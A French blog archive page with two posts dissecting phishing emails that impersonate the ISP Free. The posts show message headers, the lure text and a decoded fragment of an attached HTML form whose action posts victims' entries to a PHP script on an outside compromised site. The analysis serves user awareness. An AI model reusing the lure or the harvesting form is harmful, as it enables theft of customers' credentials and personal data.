Rss

Archives for : free.fr

Nouveau phishing pour free.fr

Celui-ci étant particulièrement mauvais et très facilement repérable, je vous laisse juger par vous-même.

Sobrement intitulé « Abonnement prélevé &n double ( 39.90 * 2) E », on ne se doute déjà de rien… L’adresse d’expédition est du domaine sfr.fr, ce qui rend le tout encore plus crédible. Un regard rapide à l’en-tête du message permet de voir que notre expéditeur vient du maroc, l’adresse IP utilisée pour l’envoi étant 105.141.5.212 qui correspond à un netblock attribué à SEPFS Maroc Telecom ; il y a aussi un champ X-SFR-UUID valant 20120528025014537.83379700008B@msfrf1104.sfr.fr.

Continue Reading >>

Nouvelle tentative de phishing pour free.fr

Et celle-ci est plus subtile que les précédentes, son auteur ayant eu la malice de forger un champ From particulèrement adapté pour passer sans soucis le filtrage des serveurs SMTP ; voici l’en-tête du message, mon email étant remplacée par [snip]@[snap] :

Return-Path: <Freebox@free.fr>
Delivered-To: free.fr-[snip]@[snap]
Received: (qmail 14355 invoked from network); 18 Apr 2012 17:35:02 -0000
Received: from mx20-g26.free.fr (HELO PORTABLE) (212.27.42.59)
  by mrelay9-g25.free.fr with SMTP; 18 Apr 2012 17:35:02 -0000
Received: from PORTABLE ([209.61.136.162])
	by mx1-g20.free.fr (MXproxy) for [snip]@[snap];
	Wed, 18 Apr 2012 19:35:02 +0200 (CEST)
X-ProXaD-SC: state=HAM score=0
From: "Freebox@free.fr" <Freebox@free.fr>
Subject: Code : IN1798234
To: [snip]@[snap]
Content-Type: multipart/mixed; charset="utf-8"; boundary="9V2r2NdFA41pwmVy=_WnXYmLeA7Zdw4FWK"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Date: Wed, 18 Apr 2012 17:35:09 +0000

Le sujet du message est donc de la forme Code : IN1798234 et l’introduction invite l’utilisateur à remplir un formulaire :

Cher client ! Votre Identifiant Client : IN1798234

une nouvelle Protection pour votre dossier.

(1) Telechargez la piece jointe fournie par notre equipe de securite.
(2) Ouvrez le fichier joint (dans votre navigateur Web) et de remplir le besoin domaines.

Cette intervention vous sera facturee.
Cordialement

l'equipe free.

On notera l’abscence d’accents et la surprenante fin de phrase du (2) ^^

Le contenu est aussi pensé pour ne pas « trop » choquer un client peu habitué ou particulièrement naïf, s’il en existe encore… le message inclut donc un formulaire, encodé en base64 pour ne pas être facilement lisible, permettant de piéger la victime.

Une fois décodé, on voit facilement l’arnaque 😉 :

[...]
<form method="post" action="http://www.mediainvent.rs/wp-content/themes/twentyten/zob.php" name="formulaire" onsubmit="return validation();">
[...]

Continue Reading >>